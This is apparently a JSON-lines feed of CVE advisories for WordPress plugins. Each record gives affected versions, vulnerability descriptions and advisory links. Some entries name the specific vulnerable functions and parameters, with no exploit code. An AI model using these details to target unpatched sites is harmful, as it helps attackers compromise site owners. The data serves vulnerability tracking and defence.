{"CVE_ID":"CVE-2023-2897","slug":"brizy","versionImpact":"2.4.18","description":"The Brizy Page Builder plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.4.18. This is due to an implicit trust of user-supplied IP addresses in an 'X-Forwarded-For' HTTP header for the purpose of validating allowed IP addresses against a Maintenance Mode whitelist. Supplying a whitelisted IP address within the 'X-Forwarded-For' header allows maintenance mode to be bypassed and may result in the disclosure of potentially sensitive information or allow access to restricted functionality.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae342dd9-2f5f-4356-8fb4-9a3e5f4f8316?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae342dd9-2f5f-4356-8fb4-9a3e5f4f8316?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2919443\\\/brizy\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2919443\\\/brizy\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4917","slug":"leyka","versionImpact":"3.30.3","description":"The Leyka plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 3.30.3 via the 'leyka_ajax_get_env_and_options' function. This can allow authenticated attackers with subscriber-level permissions or above to extract sensitive data including Sberbank API key and password, PayPal Client Secret, and more keys and passwords.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leyka\\\/tags\\\/3.30.3\\\/inc\\\/leyka-ajax.php#L393\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leyka\\\/tags\\\/3.30.3\\\/inc\\\/leyka-ajax.php#L393\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcd24b90-94ff-4625-8e3e-9c90e38683f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcd24b90-94ff-4625-8e3e-9c90e38683f9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-49744","slug":"gift-up","versionImpact":"2.21.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in Gift Up Gift Up Gift Cards for WordPress and WooCommerce.This issue affects Gift Up Gift Cards for WordPress and WooCommerce: from n\/a through 2.21.3.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gift-up\\\/wordpress-gift-up-gift-cards-for-wordpress-and-woocommerce-plugin-2-21-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gift-up\\\/wordpress-gift-up-gift-cards-for-wordpress-and-woocommerce-plugin-2-21-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0824","slug":"userplus","versionImpact":"2.0","description":"The User registration & user profile WordPress plugin through 2.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged-in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/48a3a542-9130-4524-9d19-ff9eccecb148\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/48a3a542-9130-4524-9d19-ff9eccecb148\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1810","slug":"archivist-custom-archive-templates","versionImpact":"1.7.5","description":"The Archivist \u2013 Custom Archive Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018shortcode_attributes' parameter in all versions up to, and including, 1.7.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e230f9f-5eda-4362-973b-ada9cf425697?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e230f9f-5eda-4362-973b-ada9cf425697?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040242%40archivist-custom-archive-templates&new=3040242%40archivist-custom-archive-templates&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040242%40archivist-custom-archive-templates&new=3040242%40archivist-custom-archive-templates&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1793","slug":"aweber-web-form-widget","versionImpact":"7.3.14","description":"The AWeber \u2013 Free Sign Up Form and Landing Page Builder Plugin for Lead Generation and Email Newsletter Growth plugin for WordPress is vulnerable to SQL Injection via the 'post_id' parameter in all versions up to, and including, 7.3.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3ae3bca-d363-4c4b-809f-0625385bc9a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3ae3bca-d363-4c4b-809f-0625385bc9a6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aweber-web-form-widget\\\/tags\\\/7.3.12\\\/php\\\/aweber_webform_plugin.php#L962\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aweber-web-form-widget\\\/tags\\\/7.3.12\\\/php\\\/aweber_webform_plugin.php#L962\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aweber-web-form-widget\\\/tags\\\/7.3.12\\\/php\\\/aweber_webform_plugin.php#L970\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aweber-web-form-widget\\\/tags\\\/7.3.12\\\/php\\\/aweber_webform_plugin.php#L970\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aweber-web-form-widget\\\/tags\\\/7.3.12\\\/php\\\/aweber_webform_plugin.php#L972\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aweber-web-form-widget\\\/tags\\\/7.3.12\\\/php\\\/aweber_webform_plugin.php#L972\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/glimmer-handball-dae.notion.site\\\/AWeber-Authenticated-SQLi-Admin-6e0d31c4a14c42f4996f9e201482d4cc?pvs=4\",\"name\":\"https:\\\/\\\/glimmer-handball-dae.notion.site\\\/AWeber-Authenticated-SQLi-Admin-6e0d31c4a14c42f4996f9e201482d4cc?pvs=4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042751%40aweber-web-form-widget&new=3042751%40aweber-web-form-widget&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042751%40aweber-web-form-widget&new=3042751%40aweber-web-form-widget&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3405","slug":"wp-prayer","versionImpact":"2.0.9","description":"The WP Prayer WordPress plugin through 2.0.9 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6968d43c-16ff-43a9-8451-71aabbe69014\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6968d43c-16ff-43a9-8451-71aabbe69014\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1375","slug":"event-post","versionImpact":"5.9.5","description":"The Event post plugin for WordPress is vulnerable to unauthorized bulk metadata update due to a missing nonce check on the save_bulkdatas function in all versions up to, and including, 5.9.5. This makes it possible for unauthenticated attackers to update post_meta_data via a forged request, granted they can trick a logged-in user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/964950dc-d8e1-4a9b-bef2-ea51abc5a925?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/964950dc-d8e1-4a9b-bef2-ea51abc5a925?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-post\\\/trunk\\\/eventpost.php?rev=3086840#L2446\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-post\\\/trunk\\\/eventpost.php?rev=3086840#L2446\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8442","slug":"bdthemes-prime-slider-lite","versionImpact":"3.15.18","description":"The Prime Slider \u2013 Addons For Elementor (Revolution of a slider, Hero Slider, Ecommerce Slider) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Blog widget in all versions up to, and including, 3.15.18 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eff765b4-22d1-4311-8a69-af6b41ef4b6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eff765b4-22d1-4311-8a69-af6b41ef4b6e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-prime-slider-lite\\\/trunk\\\/traits\\\/global-widget-controls.php#L2328\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-prime-slider-lite\\\/trunk\\\/traits\\\/global-widget-controls.php#L2328\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-prime-slider-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-prime-slider-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182825\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182825\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11808","slug":"pingmeter-uptime-monitoring","versionImpact":"1.0.3","description":"The Pingmeter Uptime Monitoring plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_wpnonce' parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pingmeter-uptime-monitoring\\\/trunk\\\/pingmeter.php#L909\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pingmeter-uptime-monitoring\\\/trunk\\\/pingmeter.php#L909\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7da41c7c-31c4-4e95-ac5a-25bd17e507b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7da41c7c-31c4-4e95-ac5a-25bd17e507b9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12285","slug":"sema-api","versionImpact":"5.27","description":"The SEMA API plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018catid\u2019 parameter in all versions up to, and including, 5.27 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sema-api\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sema-api\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42b9e16c-8e53-452d-9c0b-34c424d6f508?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42b9e16c-8e53-452d-9c0b-34c424d6f508?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3782","slug":"cision-block","versionImpact":"4.3.0","description":"The Cision Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 4.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cision-block\\\/tags\\\/4.3.0\\\/src\\\/Frontend\\\/templates\\\/cision-block.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cision-block\\\/tags\\\/4.3.0\\\/src\\\/Frontend\\\/templates\\\/cision-block.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288041\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288041\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cision-block\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cision-block\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5b8268a-f3a3-4576-b235-962de37cc388?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5b8268a-f3a3-4576-b235-962de37cc388?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4194","slug":"alt-monitoring","versionImpact":"1.0.3","description":"The AlT Monitoring plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.3. This is due to missing or incorrect nonce validation on the 'ALT_Monitoring_edit' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alt-monitoring\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alt-monitoring\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7290317-418d-4e5c-85fa-f931cc4a865b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7290317-418d-4e5c-85fa-f931cc4a865b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7696","slug":"integration-for-contact-form-7-and-pipedrive","versionImpact":"1.2.3","description":"The Integration for Pipedrive and Contact Form 7, WPForms, Elementor, Ninja Forms plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.3 via deserialization of untrusted input within the verify_field_val() function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain in the Contact Form 7 plugin, which is likely to be used alongside, allows attackers to delete arbitrary files, leading to a denial of service or remote code execution when the wp-config.php file is deleted.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-for-contact-form-7-and-pipedrive\\\/tags\\\/1.2.3\\\/integration-for-contact-form-7-and-pipedrive.php#L953\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integration-for-contact-form-7-and-pipedrive\\\/tags\\\/1.2.3\\\/integration-for-contact-form-7-and-pipedrive.php#L953\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329002\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329002\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/integration-for-contact-form-7-and-pipedrive\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/integration-for-contact-form-7-and-pipedrive\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6980112b-a555-47a4-b2d7-f0187d52fc63?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6980112b-a555-47a4-b2d7-f0187d52fc63?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1334","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized cache modification due to a missing capability check on the queue_posts function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to modify the plugin's cache.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3108ef4-f889-4ae1-b86f-cedf46dcea19\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3108ef4-f889-4ae1-b86f-cedf46dcea19\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0421","slug":"cloud-manager","versionImpact":"1.0","description":"The Cloud Manager WordPress plugin through 1.0 does not sanitise and escape the query param ricerca before outputting it in an admin panel, allowing unauthenticated attackers to trick a logged in admin to trigger a XSS payload by clicking a link.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a356fea0-f143-4736-b2b2-c545c525335c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a356fea0-f143-4736-b2b2-c545c525335c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2896","slug":"wp-easycart","versionImpact":"5.4.8","description":"The WP EasyCart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.4.8. This is due to missing or incorrect nonce validation on the process_duplicate_product function. This makes it possible for unauthenticated attackers to duplicate products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/041830b8-f059-46f5-961b-3ba908d161f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/041830b8-f059-46f5-961b-3ba908d161f9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4916","slug":"login-with-phone-number","versionImpact":"1.4.8","description":"The Login with phone number plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.8. This is due to missing nonce validation on the 'lwp_update_password_action' function. This makes it possible for unauthenticated attackers to change user password via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/trunk\\\/login-with-phonenumber.php#L2953\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/trunk\\\/login-with-phonenumber.php#L2953\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71083db7-377b-47a1-ac8b-83d8974a2654?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71083db7-377b-47a1-ac8b-83d8974a2654?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0769","slug":"hiweb-migration-simple","versionImpact":"2.0.0.1","description":"The hiWeb Migration Simple WordPress plugin through 2.0.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admins.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d4a2f0e-a371-4e27-98de-528e070f41b0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d4a2f0e-a371-4e27-98de-528e070f41b0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1758","slug":"woocommerce-superfaktura","versionImpact":"1.40.3","description":"The SuperFaktura WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.40.3 via the wc_sf_url_check function. This makes it possible for authenticated attackers, with subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/520598d7-863f-4bf3-ba74-fa9b2cc32767?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/520598d7-863f-4bf3-ba74-fa9b2cc32767?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-superfaktura\\\/trunk\\\/class-wc-superfaktura.php#L3418\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-superfaktura\\\/trunk\\\/class-wc-superfaktura.php#L3418\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040372%40woocommerce-superfaktura&new=3040372%40woocommerce-superfaktura&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040372%40woocommerce-superfaktura&new=3040372%40woocommerce-superfaktura&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1772","slug":"play-ht","versionImpact":"3.6.4","description":"The Play.ht \u2013 Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.6.4 via deserialization of untrusted input from the play_podcast_data post meta. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83a595b7-379c-4202-abdd-d8ba4a30c6a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83a595b7-379c-4202-abdd-d8ba4a30c6a4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/play-ht\\\/trunk\\\/includes\\\/class-ajax-handler.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/play-ht\\\/trunk\\\/includes\\\/class-ajax-handler.php#L138\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5485","slug":"suretriggers","versionImpact":"1.0.47","description":"The SureTriggers \u2013 Connect All Your Plugins, Apps, Tools & Automate Everything! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Trigger Link shortcode in all versions up to, and including, 1.0.47 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab19f7b1-2b1e-43bc-9843-ddee0fc74f50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab19f7b1-2b1e-43bc-9843-ddee0fc74f50?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/suretriggers\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/suretriggers\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096816\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096816\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12526","slug":"arena-liveblog-and-chat-tool","versionImpact":"0.4.1","description":"The Arena.IM \u2013 Live Blogging for real-time events plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.3.0. This is due to missing or incorrect nonce validation on the 'albfre_user_action' AJAX action. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arena-liveblog-and-chat-tool\\\/trunk\\\/albfre.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arena-liveblog-and-chat-tool\\\/trunk\\\/albfre.php#L125\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9173644-f0b2-4de3-8e58-fd556d8e38cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9173644-f0b2-4de3-8e58-fd556d8e38cd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
